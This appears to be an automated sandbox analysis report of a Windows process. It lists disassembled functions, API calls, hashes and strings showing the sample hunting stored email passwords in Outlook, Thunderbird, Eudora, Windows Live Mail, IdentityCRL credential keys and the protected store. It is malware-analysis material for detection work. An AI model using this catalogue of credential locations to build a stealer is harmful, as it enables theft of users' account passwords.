                                                                                                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                • strlen.MSVCRT ref: 00407F5C
                                                                                                                • strlen.MSVCRT ref: 00407F64
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                                                • String ID: ACD
                                                                                                                • API String ID: 379999529-620537770
                                                                                                                • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401E8B
                                                                                                                • strlen.MSVCRT ref: 00401EA4
                                                                                                                • strlen.MSVCRT ref: 00401EB2
                                                                                                                • strlen.MSVCRT ref: 00401EF8
                                                                                                                • strlen.MSVCRT ref: 00401F06
                                                                                                                • memset.MSVCRT ref: 00401FB1
                                                                                                                • atoi.MSVCRT ref: 00401FE0
                                                                                                                • memset.MSVCRT ref: 00402003
                                                                                                                • sprintf.MSVCRT ref: 00402030
                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                • memset.MSVCRT ref: 00402086
                                                                                                                • memset.MSVCRT ref: 0040209B
                                                                                                                • strlen.MSVCRT ref: 004020A1
                                                                                                                • strlen.MSVCRT ref: 004020AF
                                                                                                                • strlen.MSVCRT ref: 004020E2
                                                                                                                • strlen.MSVCRT ref: 004020F0
                                                                                                                • memset.MSVCRT ref: 00402018
                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                • _mbscpy.MSVCRT ref: 00402177
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                • API String ID: 1846531875-4223776976
                                                                                                                • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                                                                • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                                                                • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040CF44 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                                                                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                • API String ID: 745651260-375988210
                                                                                                                • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                                                                • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                                                                • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                • _mbscpy.MSVCRT ref: 00403E54
                                                                                                                Strings
                                                                                                                • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                • pstorec.dll, xrefs: 00403C30
                                                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                • API String ID: 1197458902-317895162
                                                                                                                • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                                • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                                • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 236 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->236 235->234 237 444c75-444c7e 235->237 246 444d02-444d0d __setusermatherr 236->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 236->247 239 444c80-444c85 237->239 240 444c9f-444ca3 237->240 239->234 241 444c8c-444c93 239->241 240->234 242 444ca5-444ca7 240->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->236 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                • String ID: k:v
                                                                                                                • API String ID: 3662548030-4078055367
                                                                                                                • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                                • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                                • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                                • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                • memcpy.MSVCRT ref: 0040FBE4
                                                                                                                • memcpy.MSVCRT ref: 0040FBF9
                                                                                                                  • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                                                • API String ID: 2768085393-2409096184
                                                                                                                • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0044430B
                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                                                                                • memset.MSVCRT ref: 00444379
                                                                                                                • memset.MSVCRT ref: 00444394
                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                • strlen.MSVCRT ref: 004443DB
                                                                                                                • _strcmpi.MSVCRT ref: 00444401
                                                                                                                Strings
                                                                                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                • Store Root, xrefs: 004443A5
                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                • API String ID: 832325562-2578778931
                                                                                                                • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040F567
                                                                                                                • memset.MSVCRT ref: 0040F57F
                                                                                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                • memcpy.MSVCRT ref: 0040F652
                                                                                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2012582556-3916222277
                                                                                                                • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004037EB
                                                                                                                • memset.MSVCRT ref: 004037FF
                                                                                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                                                • strchr.MSVCRT ref: 0040386E
                                                                                                                • _mbscpy.MSVCRT ref: 0040388B
                                                                                                                • strlen.MSVCRT ref: 00403897
                                                                                                                • sprintf.MSVCRT ref: 004038B7
                                                                                                                • _mbscpy.MSVCRT ref: 004038CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                • String ID: %s@yahoo.com
                                                                                                                • API String ID: 317221925-3288273942
                                                                                                                • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 361 404af5-404afa 356->361 362 404adb 357->362 358->356 359 404ae8-404aea 358->359 359->361 363 404b13-404b17 361->363 364 404afc-404b12 MessageBoxA 361->364 362->358
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403504
                                                                                                                • memset.MSVCRT ref: 0040351A
                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                • _mbscpy.MSVCRT ref: 00403555
                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                • _mbscat.MSVCRT ref: 0040356D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                • API String ID: 3071782539-966475738
                                                                                                                • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040F6E2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
